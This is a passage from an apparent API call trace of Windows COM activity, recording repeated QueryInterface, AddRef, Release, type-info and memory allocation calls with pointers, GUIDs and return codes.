This=0xb5a5078, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fe0 | out: ppvObject=0x2e5fe0*=0x0) returned 0x80004002 [0032.560] IUnknown:QueryInterface (in: This=0xb5a5078, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fe8 | out: ppvObject=0x2e5fe8*=0x0) returned 0x80004002 [0032.560] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5078, ppTypeAttr=0x2e6018, pDummy=0x10 | out: ppTypeAttr=0x2e6018, pDummy=0x10) returned 0x0 [0032.560] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5078) returned 0x0 [0032.560] IUnknown:AddRef (This=0xb5a5078) returned 0x4 [0032.560] IUnknown:QueryInterface (in: This=0xb5a51f8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6030 | out: ppvObject=0x2e6030*=0x0) returned 0x80004002 [0032.560] IUnknown:QueryInterface (in: This=0xb5a51f8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6000 | out: ppvObject=0x2e6000*=0x0) returned 0x80004002 [0032.560] IUnknown:QueryInterface (in: This=0xb5a51f8, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0032.560] IUnknown:QueryInterface (in: This=0xb5a51f8, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff8 | out: ppvObject=0x2e5ff8*=0x0) returned 0x80004002 [0032.560] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a51f8, ppTypeAttr=0x2e6028, pDummy=0x10 | out: ppTypeAttr=0x2e6028, pDummy=0x10) returned 0x0 [0032.560] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a51f8) returned 0x0 [0032.560] IUnknown:AddRef (This=0xb5a51f8) returned 0x2 [0032.561] IUnknown:AddRef (This=0xb5a50d8) returned 0x3 [0032.561] IUnknown:AddRef (This=0xb5a5078) returned 0x4 [0032.561] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494a50 [0032.561] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6148 | out: ppvObject=0x2e6148*=0x0) returned 0x80004002 [0032.561] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667260 [0032.561] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667f20 [0032.561] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fa0 | out: ppvObject=0x2e5fa0*=0x0) returned 0x80004002 [0032.561] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f70 | out: ppvObject=0x2e5f70*=0x0) returned 0x80004002 [0032.561] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f60 | out: ppvObject=0x2e5f60*=0x0) returned 0x80004002 [0032.561] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f68 | out: ppvObject=0x2e5f68*=0x0) returned 0x80004002 [0032.561] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4db9e8, ppTypeAttr=0x2e5f98, pDummy=0x10 | out: ppTypeAttr=0x2e5f98, pDummy=0x10) returned 0x0 [0032.561] ITypeInfo:LocalReleaseTypeAttr (This=0xb4db9e8) returned 0x0 [0032.561] IUnknown:AddRef (This=0xb4db9e8) returned 0x2 [0032.561] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fb0 | out: ppvObject=0x2e5fb0*=0x0) returned 0x80004002 [0032.561] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f80 | out: ppvObject=0x2e5f80*=0x0) returned 0x80004002 [0032.561] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f70 | out: ppvObject=0x2e5f70*=0x0) returned 0x80004002 [0032.561] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f78 | out: ppvObject=0x2e5f78*=0x0) returned 0x80004002 [0032.561] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4dba40, ppTypeAttr=0x2e5fa8, pDummy=0x10 | out: ppTypeAttr=0x2e5fa8, pDummy=0x10) returned 0x0 [0032.561] ITypeInfo:LocalReleaseTypeAttr (This=0xb4dba40) returned 0x0 [0032.561] IUnknown:AddRef (This=0xb4dba40) returned 0x2 [0032.561] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0032.561] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fc0 | out: ppvObject=0x2e5fc0*=0x0) returned 0x80004002 [0032.561] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fb0 | out: ppvObject=0x2e5fb0*=0x0) returned 0x80004002 [0032.561] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fb8 | out: ppvObject=0x2e5fb8*=0x0) returned 0x80004002 [0032.561] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4db990, ppTypeAttr=0x2e5fe8, pDummy=0x10 | out: ppTypeAttr=0x2e5fe8, pDummy=0x10) returned 0x0 [0032.561] ITypeInfo:LocalReleaseTypeAttr (This=0xb4db990) returned 0x0 [0032.562] IUnknown:AddRef (This=0xb4db990) returned 0x3 [0032.562] IUnknown:Release (This=0xb4db9e8) returned 0x1 [0032.562] IUnknown:Release (This=0xb4dba40) returned 0x1 [0032.562] IMalloc:Free (This=0x7fefe015380, pv=0xb494a50) [0032.562] IUnknown:AddRef (This=0xb4db990) returned 0x3 [0032.562] IMalloc:Free (This=0x7fefe015380, pv=0x7667260) [0032.562] IMalloc:Free (This=0x7fefe015380, pv=0x7667f20) [0032.562] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667f20 [0032.562] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667260 [0032.562] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6020 | out: ppvObject=0x2e6020*=0x0) returned 0x80004002 [0032.562] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0032.562] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fe0 | out: ppvObject=0x2e5fe0*=0x0) returned 0x80004002 [0032.562] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fe8 | out: ppvObject=0x2e5fe8*=0x0) returned 0x80004002 [0032.562] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4db9e8, ppTypeAttr=0x2e6018, pDummy=0x10 | out: ppTypeAttr=0x2e6018, pDummy=0x10) returned 0x0 [0032.562] ITypeInfo:LocalReleaseTypeAttr (This=0xb4db9e8) returned 0x0 [0032.562] IUnknown:AddRef (This=0xb4db9e8) returned 0x2 [0032.562] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6030 | out: ppvObject=0x2e6030*=0x0) returned 0x80004002 [0032.562] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6000 | out: ppvObject=0x2e6000*=0x0) returned 0x80004002 [0032.562] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0032.562] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff8 | out: ppvObject=0x2e5ff8*=0x0) returned 0x80004002 [0032.562] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4dba40, ppTypeAttr=0x2e6028, pDummy=0x10 | out: ppTypeAttr=0x2e6028, pDummy=0x10) returned 0x0 [0032.562] ITypeInfo:LocalReleaseTypeAttr (This=0xb4dba40) returned 0x0 [0032.562] IUnknown:AddRef (This=0xb4dba40) returned 0x2 [0032.562] IUnknown:AddRef (This=0xb4db990) returned 0x3 [0032.562] IUnknown:AddRef (This=0xb4db9e8) returned 0x2 [0032.563] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494a50 [0032.563] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6148 | out: ppvObject=0x2e6148*=0x0) returned 0x80004002 [0032.563] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666000 [0032.563] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce610 [0032.563] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fa0 | out: ppvObject=0x2e5fa0*=0x0) returned 0x80004002 [0032.563] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f70 | out: ppvObject=0x2e5f70*=0x0) returned 0x80004002 [0032.563] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f60 | out: ppvObject=0x2e5f60*=0x0) returned 0x80004002 [0032.563] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f68 | out: ppvObject=0x2e5f68*=0x0) returned 0x80004002 [0032.563] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4db9e8, ppTypeAttr=0x2e5f98, pDummy=0x10 | out: ppTypeAttr=0x2e5f98, pDummy=0x10) returned 0x0 [0032.563] ITypeInfo:LocalReleaseTypeAttr (This=0xb4db9e8) returned 0x0 [0032.563] IUnknown:AddRef (This=0xb4db9e8) returned 0x3 [0032.563] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fb0 | out: ppvObject=0x2e5fb0*=0x0) returned 0x80004002 [0032.563] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f80 | out: ppvObject=0x2e5f80*=0x0) returned 0x80004002 [0032.563] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f70 | out: ppvObject=0x2e5f70*=0x0) returned 0x80004002 [0032.563] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f78 | out: ppvObject=0x2e5f78*=0x0) returned 0x80004002 [0032.563] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4dba40, ppTypeAttr=0x2e5fa8, pDummy=0x10 | out: ppTypeAttr=0x2e5fa8, pDummy=0x10) returned 0x0 [0032.563] ITypeInfo:LocalReleaseTypeAttr (This=0xb4dba40) returned 0x0 [0032.563] IUnknown:AddRef (This=0xb4dba40) returned 0x3 [0032.563] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0032.563] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fc0 | out: ppvObject=0x2e5fc0*=0x0) returned 0x80004002 [0032.563] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fb0 | out: ppvObject=0x2e5fb0*=0x0) returned 0x80004002 [0032.563] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fb8 | out: ppvObject=0x2e5fb8*=0x0) returned 0x80004002 [0032.563] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4db990, ppTypeAttr=0x2e5fe8, pDummy=0x10 | out: ppTypeAttr=0x2e5fe8, pDummy=0x10) returned 0x0 [0032.563] ITypeInfo:LocalReleaseTypeAttr (This=0xb4db990) returned 0x0 [0032.563] IUnknown:AddRef (This=0xb4db990) returned 0x4 [0032.563] IUnknown:Release (This=0xb4db9e8) returned 0x2 [0032.563] IUnknown:Release (This=0xb4dba40) returned 0x2 [0032.563] IMalloc:Free (This=0x7fefe015380, pv=0xb494a50) [0032.563] IUnknown:AddRef (This=0xb4db990) returned 0x4 [0032.563] IMalloc:Free (This=0x7fefe015380, pv=0x7666000) [0032.564] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce610) [0032.564] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce610 [0032.564] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce5e0 [0032.564] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6020 | out: ppvObject=0x2e6020*=0x0) returned 0x80004002 [0032.564] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0032.564] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fe0 | out: ppvObject=0x2e5fe0*=0x0) returned 0x80004002 [0032.564] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fe8 | out: ppvObject=0x2e5fe8*=0x0) returned 0x80004002 [0032.564] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4db9e8, ppTypeAttr=0x2e6018, pDummy=0x10 | out: ppTypeAttr=0x2e6018, pDummy=0x10) returned 0x0 [0032.564] ITypeInfo:LocalReleaseTypeAttr (This=0xb4db9e8) returned 0x0 [0032.564] IUnknown:AddRef (This=0xb4db9e8) returned 0x3 [0032.564] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6030 | out: ppvObject=0x2e6030*=0x0) returned 0x80004002 [0032.564] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6000 | out: ppvObject=0x2e6000*=0x0) returned 0x80004002 [0032.564] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0032.564] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff8 | out: ppvObject=0x2e5ff8*=0x0) returned 0x80004002 [0032.564] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4dba40, ppTypeAttr=0x2e6028, pDummy=0x10 | out: ppTypeAttr=0x2e6028, pDummy=0x10) returned 0x0 [0032.564] ITypeInfo:LocalReleaseTypeAttr (This=0xb4dba40) returned 0x0 [0032.564] IUnknown:AddRef (This=0xb4dba40) returned 0x3 [0032.564] IUnknown:AddRef (This=0xb4db990) returned 0x4 [0032.564] IUnknown:AddRef (This=0xb4db9e8) returned 0x3 [0032.564] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494a50 [0032.564] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6148 | out: ppvObject=0x2e6148*=0x0) returned 0x80004002 [0032.564] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce5b0 [0032.565] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce580 [0032.565] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fa0 | out: ppvObject=0x2e5fa0*=0x0) returned 0x80004002 [0032.565] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f70 | out: ppvObject=0x2e5f70*=0x0) returned 0x80004002 [0032.565] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f60 | out: ppvObject=0x2e5f60*=0x0) returned 0x80004002 [0032.565] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f68 | out: ppvObject=0x2e5f68*=0x0) returned 0x80004002 [0032.565] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4db9e8, ppTypeAttr=0x2e5f98, pDummy=0x10 | out: ppTypeAttr=0x2e5f98, pDummy=0x10) returned 0x0 [0032.565] ITypeInfo:LocalReleaseTypeAttr (This=0xb4db9e8) returned 0x0 [0032.565] IUnknown:AddRef (This=0xb4db9e8) returned 0x4 [0032.565] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fb0 | out: ppvObject=0x2e5fb0*=0x0) returned 0x80004002 [0032.565] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f80 | out: ppvObject=0x2e5f80*=0x0) returned 0x80004002 [0032.565] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f70 | out: ppvObject=0x2e5f70*=0x0) returned 0x80004002 [0032.565] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5f78 | out: ppvObject=0x2e5f78*=0x0) returned 0x80004002 [0032.565] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4dba40, ppTypeAttr=0x2e5fa8, pDummy=0x10 | out: ppTypeAttr=0x2e5fa8, pDummy=0x10) returned 0x0 [0032.565] ITypeInfo:LocalReleaseTypeAttr (This=0xb4dba40) returned 0x0 [0032.565] IUnknown:AddRef (This=0xb4dba40) returned 0x4 [0032.565] IUnknown:QueryInterface (in: This=0xb4db990, 